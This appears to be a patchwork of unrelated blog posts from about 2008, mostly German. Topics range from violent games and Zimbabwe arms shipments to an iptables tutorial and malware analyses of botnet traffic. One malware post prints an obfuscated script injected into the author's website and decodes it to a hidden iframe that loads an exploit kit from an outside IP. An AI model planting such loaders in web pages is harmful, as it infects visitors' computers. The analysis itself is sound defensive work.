• Multitouch Aquarium at Telekom Headquarters, Bonn (Part 1)
• Multitouch Aquarium at Telekom Headquarters, Bonn (Part 2)

• Geiz ist geil?
• Alles nur eine Frage der Technik?

Zumindest wenn es um die Sicherheit der Kundendaten geht, ist Geiz zumindest nicht so geil. Lustig, dass Saturn trotzdem verspricht: “Ihre bei uns gespeicherten Daten schützen wir und unsere Partnerunternehmen durch technische und organisatorische Maßnahmen, um einem Missbrauch durch Dritte wirkungsvoll vorzubeugen“.

Was musste ich heute auf Spiegel Online lesen?

Als bestätigt gilt inzwischen die Vorliebe des Amokläufers für Waffen und gewaltlastige Computerspiele. Demnach hat er in den vergangenen Monaten viel Zeit mit Killerspielen verbracht und in seiner Freizeit mit Softair-Waffen geschossen. “Das kann ich bestätigen”, sagte der Polizeisprecher Klaus Hinderer am Donnerstag der Deutschen Presse-Agentur. “Wir haben bei ihm unter anderem das Spiel Counter-Strike gefunden.”

Weiter heißt es:

“Dass der 17-Jährige auf der Flucht noch weiter um sich geschossen hat, ist ein Verhalten, das Jugendliche auch in Spielen wie Counter-Strike oder Crysis lernen können“, sagte der Präsident der Deutschen Stiftung für Verbrechensbekämpfung, Hans-Dieter Schwind, der “Neuen Osnabrücker Zeitung” und sprach sich für ein totales Verbot von Computer-Gewaltspielen [...] aus.

So einfach ist das. Ein Amoklauf und die Computerspiele sind schuld, nicht wahr, sehr geehrter Herr Schwind? Dass man diese Spiele aber garnicht verbieten kann, ist Ihnen auch klar? Wer ein solches Spiel will, der bekommt es auch. Das Internet bietet ungeahnte Möglichkeiten. Vielmehr sollte man soziale Kompetenzen und Vertrauenswerte aufbauen, denn kein gesunder Mensch, der sozial integriert und nicht psychisch labil ist, hat einen solchen Knacks weg. Millionen Menschen spielen weltweit gewalttätige Spiele. Aussetzer gibt es nur in Promillefällen und selbst hier ist nicht gesagt, dass die Spiele ein Grund dafür sind.

Ich für meinen Teil würde alle Autorennspiele verbieten. Täglich sterben Menschen auf deutschen Straßen aufgrund von Raserei. Raserei ist ein Verhalten, das Jugendliche auch in Spielen wie Need-for-Speed oder Grand Theft Auto lernen können. Daher spreche ich mich hiermit  für ein totales Verbot von Computer-Rennspielen aus. Schließlich bieten Autos Gefahrenpotentiale, durch welche in Deutschland wesentlich mehr Menschen umkommen als durch Schusswaffen.

Vor ein paar Jahren hatte ich mich bei einer Agentur eingeschrieben, die Hochschulabsolventen, Young Professionals und Studierende in Teil- oder Vollzeit an Unternehmen vermittelt. Nachdem ich nun (auf anderen Wegen) einen Job gefunden habe, wollte ich meine Daten dort löschen (lassen). Zugriff auf sein eigenes hinterlegtes Profil in der Datenbank (für Updates) erlangte man über einen einfachen Link der Form

http://www.firma.xx/xxxxxxxx/xxxxxx.php?id=<userID>&hash=<someHash>

Verdächtig genug – keinerlei weitere Authentifikation. Der Hash, als Mapping auf die ID, sollte wohl Verifikation genug sein, um nicht auf andere Daten zugreifen zu können. Eine Art Passwort also, das der User jedoch nicht kennen muss, außer er will seine eigenen Daten updaten. Dann bekommt er den Link über die Firma zugeschickt. Um die Daten zu löschen fand man im eigenen Bestand jedoch keine Möglichkeit, also bat ich darum per e-mail. Long story short: Trotz Versicherung, dass die Daten gelöscht würden, geschah lange nichts und ich musste die Jungs dort vier Mal anschreiben – eigentlich unverschämt. Irgendwann wurde es mir zu viel und ich begann, das oben genannte Mapping über den Hash auf Sicherheitstauglichkeit zu überprüften. Die Sicherheitslücke, die ich dort fand, war gravierend. Letzendlich wurde der Raum, den der Hash bot, nicht einmal voll ausgenutzt, was es prinzipiell ermöglicht, über einfachste Brute-Force Techniken Nutzerdaten auszulesen. Eine kleine Hochrechnung zeigte, dass nur wenige Trial & Error Requests zur vollkommenen Entblößung des Datenbestandes weiterer Nutzer führte. Das Krasse an der Geschichte ist jedoch, dass das Unternehmen trotz meiner sofortigen Alarmierung mit der dringenden Bitte, diesen Security-Fauxpas zu fixen, bis heute (drei Wochen später) nichts dergleichen unternommen hat. Nicht einmal ein Statement wurde dazu abgegeben, ich bekam keine Antwort auf den Sachverhalt. Aber wenigstens habe ich erreicht was ich eigentlich wollte: Meine Daten sind gelöscht und damit erstmal sicher…

Cutwail issued the following command to 208.66.194.232:80 (hosted by McColo, known for hosting nefarious stuff)
GET /40E80010484449525657494F5357594C49584F456C000000066600000000760000046BEB000530CDE1E7ED HTTP/1.0

receiving the answer from the web server

HTTP/1.0 200 OK
Date: Fri, 29 Aug 2008 18:21:44 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9
Last-Modified: Fri, 29 Aug 2008 18:21:44 GMT
Cache-Control: no-cache
Content-Length: 326160
Connection: close
Content-Type: application/octet-stream

followed by an encrypted/encoded binary. I have not been able to check that file out by now, but I might provide it to the interested reader upon request. The Rustock/Costrat binaries connect to the same network. These connections by Rustock to 208.66.194.0/24 are verified by Symantec and ThreatExpert.

Yet another proof that the top spam botnets are linked together in certain ways, this time in command-and-control.

Moreover, traffic was not completely encrypted and not at all on port 4080/tcp. Ports in use have been 7230/tcp (encrypted), 8195/tcp (encrypted), 8001/tcp (plain), 3078 (plain) and 3128 (plain with base64-encoded HTTP payload representing IP addresses (in decimal) for whatever reason, see below). Again, data shown is not sanitized or censored in any way.

POST / HTTP/1.1
Accept: */*
Accept-Language: en
Cache-Control: no-cache
Pragma: no-cache
Accept-Charset: iso-8859-1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 216.195.55.10:3128
Content-Length: 85
Connection: Keep-Alive

{NTQx9k+dqZV6afQgf2ABxEjDK5OPtU2/XPa8nj4GndeDqESDAmD0XeGBu1SS7ux0pL9vTIIFzqeYtyMXbJQMOZxHIz2ZaBBWFnttDXrlUcp=}.

.{....+\....-T5 -sV.128.194.136.173.53,80...+\....-T5 -sV.128.194.136.147.53,80...+\....-T5 -sV.128.194.137.81.53,80...+\....-T5 -sV.128.194.137.101.53,80...+\....-T5 -sV.128.194.136.240.53,80...+\....-T5 -sV.128.194.137.16.53,80...+\....-T5 -sV.128.194.137.136.53,80...+\....-T5 -sV.128.194.137.95.53,80...+\....-T5 -sV.128.194.137.35.53,80...+\....-T5 -sV.128.194.137.42.53,80.

Option -sV: Probe open ports to determine service/version info
Option -T5: Set timing template (higher is faster) <– 5 is the highest

As can be seen, the control in the botnet’s background is done via pretty diverse channels. Of course, one major task of the bot is still spamming, this short analysis concentrated on its C&C, however, using binaries from July/August 2008. Note, that this study might not be up to date any more by now…

worldpostcardart.com
superlettercard.com
yourlettercard.com
freepostcardonline.com
digitalaudiopostcard.com
lettercardadvertising.com
bestlettercard.com
audiopostcardmail.com
supergreetingcard.com
oldpostcardshop.com

While all the above domains have been created on August, 2nd, the following domain offers the Nameservers and has been created on July, 28th

brprbgok6.com

Diging these domains returns one IP with a TTL of 60 seconds, indicating Fast-Flux. I have not investigated earlier campaigns, but I wondered why only one IP was returned; typically for Fast-Flux, there is a whole bunch of short-lived IPs returned for one domain name.

The campaign’s website is kept simple:
Your download will start shortly. If you are unable to see your postcard, save it in and run on your computer.


The Binaries’ AntiVir Detection Rate is 19/36 (52.78%)

As I am the first to blog this and as I am currently not running a Storm Spambot, I guess we need to wait for Jeremy to fire up his automated extraction scripts for more insight on the respective spam messages

Update Aug 6th: Today I found more information on the spam messages at the Trend Micro Blog: http://blog.trendmicro.com/storm-uses-old-bait/.
Took them some time though…

<!-- Nerzul --><script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0035\u0038\u002e\u0036\u0035\u002e\u0032\u0033\u0035\u002e\u0034\u0031\u002f\u006c\u006c\u006c\u006c\u002f\u0073\u0074\u0064\u0073\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u003f\u0073\u0069\u0064\u003d\u0031\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script>

which decodes to

<iframe src="http://58.65.235.41/llll/stds/index.php?sid=1" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Just to be on the safe side, I used a virtual machine, Sandbox Technologies and Wireshark to visit the website and capture the packets. After the HTTP GET request on that site, a “GET /llll/stds/go.php?sid=1 HTTP/1.1\r\n” was executed, which forwarded to “GET /llll/ts/index.php HTTP/1.1\r\n“. This request occurred every 24 seconds. Following every single request, I got a lof of “Continuation or non-HTTP Traffic”, meaning there were some packets on port 80 without the HTTP header. There was a lot of HTTP-data like “Data: 783932494B4148407542324C4E414833563358417A46484D…“, so I decided to use chaosreader to gain some better understanding.
I got this interesting result. In total I got a lot of these obviously heavily obfuscated data, but they did not seem to differ alot. I de-obfuscated them using malzilla and did a “diff” on some of them:

[~/malicious]$diff exploit1 exploit2
177c177
< var fname="winSnp6O4.exe";
---
> var fname="winbtHWMzX7lmTK.exe";
[02:24:01] [~/malicious]$diff exploit2 exploit3
177c177
< var fname="winbtHWMzX7lmTK.exe";
---
> var fname="winIZdWt3zQl5YEQb.exe";
[02:24:06] [~/malicious]$diff exploit3 exploit4
177c177
< var fname="winIZdWt3zQl5YEQb.exe";
---
> var fname="winK6S9dnplSskzh.exe";


So we see, only the filenames changed. Moreover, when analyzing the de-obfuscated JS-code, it can be seen that this file includes nine different exploit vectors, including Microsoft’s MDAC, Webview Folder Icon and DirectAnimation Heap Overflow Vulnerabilities, Macromedia’s Flash Vulnerability and some more that I did not investigate.
The script will start with attack(1);, trying to create Shell Application Objects for several classids and then it will create an ADODB Stream and save the responseBody received via XMLHTTP to a file with the fixed letters “win” followed by some random ones (see above). While debugging the code on my system, creating the shell application object failed (its return value was null), so I haven’t been able to open the stream and analyze that file.
However, after failing of attack1 and attack2 (the swf exploit, the url did not ping), the other exploits were being run, but I did not go further into analysis there…

So now only the question remains, how that code came into the index.html pages of my website. My FTP password is rather strong, so that can’t be it and neither can social engineering or SQL Injections, as it was pure HTML without any DB backend. Waiting for an answer from my webhoster…

Leise sagt er [Stefan Kuntz] Sätze wie: “Der FCK ist für die Menschen wie eine alte Liebe. Wir müssen sie nur ein wenig entstauben.” Oder, etwas lauter: “Es geht doch nicht an, dass hier auf der Geschäftsstelle alle in Einzelbüros sitzen. So kommen wir nie zusammen.” Und wenn Stefan Kuntz über den drohenden Abstieg reden muss, sagt er: “Natürlich neigt sich die Waage derzeit eher in Richtung Dritte Liga. Aber das wäre auch eine Chance. Wir könnten wie beim Computer den Reset-Knopf drücken.”
In Kaiserslautern hat Kuntz mit diesen Sätzen unerhörten Erfolg. Die ganze Stadt, einschließlich Bürgermeister und Uni-Präsident, redet davon, was für ein großartiger und dabei bodenständiger Kerl “der Stefan” doch sei.

Link: http://www.welt.de/welt_print/article1957386/Kmpfen_Lautern_kmpfen.htmlкомпютри

Außerdem gibt es angeblich ein Public Viewing auf dem Stiftsplatz!

Problem: How is it possible to clone the incoming stream of packets at HOST A and forward one copy into HOST A’s userspace (for accounting applications) and the other copy to HOST B’s userspace (for testing purposes)?
The specific challenge is that I do not want a simple FORWARD to HOST B, but a FORWARD of a copy, so that I can work with the data on both machines. This leads to the next problem: Packets arriving at HOST B have the Destination IP address of HOST A in their IP header. We need to rewrite this IP at HOST B so that userspace applications are able to process these packets (which they are not, if the packets are not destined to HOST B’s address).

Note in advance: Despite all efforts this tutorial only works for connectionless udp traffic. A successful 3-way-handshake on HOST A prevents HOST B (despite IP-address rewriting) from accepting the packets in userspace. It just does not work, I appreciate any comments on that. Remember that tee is normally used to clone traffic to another host for passive sniffing and traffic analysis. Note as well, that even if you might want to keep this approach centralized and rewrite the packet’s IP addresses already at HOST A in the POSTROUTING chain, this will not work: Teed packets do not yet show up anywhere within the iptables structures to avoid interfering with the original packet’s table traversal. This is subject to change, though. Thanks to Jan Engelhardt for this information.

So here is how we achieve this goal (tested on Debian Etch stable):
History: There used to be a tee option for an experimental ROUTE target, patchable into iptables with patch-o-matic (pom). This will not work on recent kernels and is deprecated!

This is what we will do on HOST A: Get xtables-addons from http://dev.computergmbh.de:
wget http://dev.computergmbh.de/files/xtables/xtables-combined-1.5.4.1.tar.bz2
This includes a current snapshot of iptables.

Xtables-addons is the proclaimed successor to patch-o-matic(-ng). It
contains extensions that were not accepted in the main Xtables
package.
Xtables-addons is different from patch-o-matic in that you do not have
to patch or recompile either kernel or Xtables(iptables).

Untar, configure, make and make install. Should you run into problems of the kind
warning: #warning You need either CONFIG_NF_CONNTRACK or CONFIG_IP_NF_CONNTRACK
change into your kernel source directory and adapt your kernel. Therefore, look for the Networking option, find the Netfilter (formerly know as ipchains) framework entry and enable the appropriate options. I also ran into problems saying
warning: #warning You have CONFIG_IP_NF_CONNTRACK enabled, but CONFIG_IP_NF_CONNTRACK_MARK or CONFIG_IP_NF_CONNTRACK_SECMARK are not (please enable)
so be sure to enable these options as well in the IP: Netfilter Configuration section.
Save your config and build a new kernel. However, this is not topic of this tutorial.
Should there be other errors because of a special addon, deactivate it in the xtables-addons directory using the mconfig file. Be sure not to deactivate the TEE target, as this is the one we need. The installation success of the xtables-addons may largely depend on the kernel that is being used. If it just won’t work for you with your existing kernel, try another one. I had successful setups on 2.6.23.16 and 2.6.18.6

After successful installation fire the command
iptables -t mangle -A PREROUTING -p udp --dport 9996 -j TEE --gateway <IP of HOST B>.
This command will clone all incoming udp-packets to port 9996 in kernelspace and copy them to HOST B, where we will rewrite the IP addresses. Confirm by typing
iptables -t mangle -L
This will list your rules in the mangle table.
Should there be an error about an unknown table/target/chain, then xtables-addons did not build/install successful, probably because of some missing kernel options.

On HOST B: You do not need xtables-addons here, but only some standard iptables version, as you only need the default DNAT target (Your kernel needs to support it however. Therefore, make sure to have the IPv4 connection tracking support (required for NAT) option enabled in the IP: Netfilter Configuration section of your netfilter kernel category).
iptables -t nat -A PREROUTING -p udp -d <IP of HOST A> --dport 9996 -j DNAT --to-destination <IP of HOST B>:<Port>

That should be it. Now test your setup. You will need three hosts: HOST A and B and another HOST C where you will generate (UDP-) packets. Get a packet generator (I used IP-Packet) and download it to HOST C. Read its documentation, create a config file and fire up your packets to HOST A port 9996. But first, make sure you have a listening process on both, HOST A and B running and waiting for your packets on that specific port. The easiest way will be to use netcat in udp-mode:
nc -ulp9996 on HOST A and on HOST B respective with the port used there. Fire your packets and both netcat instances should receive the UDP payload data. If only HOST A gets them, your tee or DNAT is not working. Debug yourself That’s what I need to do now, as well, because teeing seems to work perfectly fine from one host, but not from the other… Same settings, though, this is just not fair :’(

Und jetzt kam Ende März endlich die Wahl und versprach Besserung, die Oppositionspartei Movement for Democratic Change (MDC) hatte eine sehr gute Ausgangsposition und allem Anschein nach auch gewonnen. Allem Anschein nach? Ja, denn nach drei Wochen sind die Wahlergebnisse immernoch nicht veröffentlicht. Mugabe verlange eine erneute Auszählung, da es in einigen Gebieten Probleme bei der Wahl gab – natürlich waren das die MDC-Hochburgen. Da der Verdacht auf möglichen Wahlbetrug schon vor der Wahl (berechtigterweise) laut wurde, waren viele unabhängige Wahlbeobachter im Land. Jüngst bei den Neuauszählungen kam es hier jedoch zu massivem Wahlbetrug, zu Gewalt, Unterdrückung und Folterung Oppositioneller in Foltercamps.

Südafrikanische Zeitungen berichten unterdessen, dass Militär, Polizei, der Geheimdienst und sogar Mugabes Leibwache dringend neue Munition und neue Waffen brauchten. Mehrere Lieferungen – Hauptlieferant China – hätten storniert werden müssen, weil die Staatsbank die Rechnungen nicht habe bezahlen können.

Und ohne Waffen ist schließlich keine Unterdrückung möglich. Leider jedoch ist die Staatskasse leer und ohne Geld keine Waffen. Im Endeffekt also keine Macht mehr. Doch wer Mugabe kennt, weiß, dass er sich trotz internationalem Druck keine Möglichkeit entgehen lässt, sich an seine Macht zu klammern. Waffen müssen also her, koste es was es wolle. Die “An Yue Jiang” ist ein chinesisches Containerschiff mit genau dieser lang ersehnten Lieferung: 70 Tonnen Waffen und Munition (laut taz: 1.500 Raketen, 2.500 Mörsergranaten, fast 100 Granatwerfer und 3,5 Millionen Schuss Munition) , angeblich im Wert von 40 Millionen EURO. Damit hätte man dem Land auf ganz andere Art und Weise dienen können. Blöd auch, dass Zimbabwe keinen Hafen hat und alle möglichen Anlaufhäfen von Regierungen geführt werden, die verhindern wollen, dass diese Waffen nach Zimbabwe gelangen. So wurde die Entladung im südafrikanischen Durban verweigert und der Transport nach Zimbabwe ohnehin verboten. Abgesehen davon:

Die [deutsche] Entwicklungsbank habe dem simbabwischen Staatskonzern “Iron & Steel Company” zur Errichtung eines Stahlwerks 1998 und dann noch einmal als Aufstockung im Jahr 2000 insgesamt Kredite “in zweistelliger Millionenhöhe” bewilligt, für die Simbabwe eine Staatsgarantie übernommen habe.

Da Mugabe also noch Schulden in etwa der Höhe der Ladung bei der deutschen Kreditanstalt für Wiederaufbau (KfW) hat, hat die Entwicklungsbank eine Pfändung der Ladung erwirkt – bevor diese jedoch in Kraft treten konnte, legte das Schiff hastig wieder von Durban ab, Ziel unbekannt. Aufgetankt werden konnte vorher allerdings nicht mehr. Es darf gespannt sein, wo das Schiff wiederentdeckt wird und welchen Hafen es versucht anzulaufen. Ob Angola erreicht werden kann steht aufgrund des Spritmangels in den Sternen und ob die Ladung bei Mugabe ankommt ist mehr als fraglich, aber aufgrund der internationalen Mobilmachung und der Entladungsweigerung der südafrikanischen Transportarbeitergewerkschaft hoffentlich eher unwahrscheinlich.

Nicht nur Südafrikas Mann im internationalen Bund der Transportarbeiter macht Front gegen Mugabe. Auch die 300.000 Mitglieder starke südafrikanische Transportarbeitergewerkschaft Satawu hat ihre Kollegen in der ganzen Welt aufgerufen, das chinesische Schiff zu boykottieren.

Diese Nachrichten habe ich zum Anlass genommen, mir nochmal Lord of War anzuschauen. Denn immernoch aktuell:

“While private gunrunners continue to thrive, the Worlds biggest arms suppliers are the U.S., U.K., Russia, France and China.”
“They are also the five permanent members of the U.N. Security Council.”

Quellen (soweit nicht anders angegeben):

• Mugabe erwartet Schiffsladung voller Waffen aus China vom 18.4.
• Mugabes Waffen-Frachter auf dem Weg nach Angola vom 20.4.
• Mugabe wartet auf das Geisterschiff vom 21.4.
• Deutsche Förderbank jagt Mugabes Waffenschiff vom 21.4.

Meine Fotos von Victoria Falls in Zimbabwe

Update: Die Ladung wird wohl zurückgerufen, Spiegelartikel vom 22.4.:

Die “An Yue Jiang” mit ihrer Ladung aus Waffen und Munition konnte in keinem afrikanischen Hafen entladen werden, weil der internationale Verband der Transportarbeiter (ITF) überall auf dem Kontinent zu einem Boykott des Schiffes aufgerufen hatte. Heute hatte sich die letzte Hoffnung der Reederei zerschlagen: Als letztes Land weigerte sich auch Angola die Ladung zu löschen. Angolas oberster Hafendirektor Filomeno Mendonca hat den letzten möglichen Schlupfwinkel an Afrikas Küste versperrt. “Das Schiff darf keinen angolanischen Hafen anlaufen,” erklärte er in einem Interview mit Radio Luanda. Menschenrechtsgruppen und Gewerkschaften hatten davor gewarnt, die Waffen nach Simbabwe gelangen zu lassen. Dort mehren sich seit den umstrittenen Wahlen vor mehr als drei Wochen Berichte über blutige Übergriffe gegen die Opposition.

UPDATE: Nachdem ich den Rechner wieder in die Vertikale gestellt habe stiegen die Temperaturen unter Last auf einmal ins Unermessliche, yikes!! Was war passiert? Die Pushpins saßen wohl nicht so fest… Naja, jedenfalls sitzt der Lüfter jetzt richtig und von den oben genannten Temperaturen könnt ihr nun ruhig ein paar Grad abziehen, nach 30 Minuten Last bleibe ich jetzt bei allen Kernen unter 60° (49° CPU Temperatur), beim Idlen bin ich bei 33-38°. Besser. Dafür rasselt der Lüfter ein bissl, aber das is mir jetzt erstmal egal, jetzt hab ich kein Bock mehr, das legt sich oder hört sich hoffentlich weg

UPDATE: Lüfter eingeschickt und austauschen lassen